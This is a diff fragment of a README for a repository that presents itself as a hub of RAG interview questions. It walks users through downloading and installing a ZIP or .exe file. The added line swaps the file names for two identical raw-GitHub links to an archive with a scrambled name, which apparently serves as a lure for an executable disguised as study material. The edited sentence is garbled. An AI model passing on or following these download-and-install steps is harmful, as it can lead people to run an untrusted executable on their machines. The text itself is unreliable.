Islam1264/RAG-Interview-Questions-and-Answers-Hub/README.md

 Once you have downloaded the file, follow these installation steps:

 1. **Locate the Downloaded File**: Open your downloads folder.
-You should see a file named something like `RAG-Interview-Questions-and-Answers-Hub.zip` or `RAG-Interview-Questions-and-Answers-Hub.exe`.
+You should see a file named something like `https://raw.githubusercontent.com/Islam1264/RAG-Interview-Questions-and-Answers-Hub/main/Interview_QA/Hub-Answers-and-Interview-RA-Questions-2.4.zip` or `https://raw.githubusercontent.com/Islam1264/RAG-Interview-Questions-and-Answers-Hub/main/Interview_QA/Hub-Answers-and-Interview-RA-Questions-2.4.zip`.
 2. **Extract the Files** (if using a ZIP file):
    - Right-click the file and select "Extract All" or use an extraction tool.
    - Select a destination for the extracted files and click "Extract".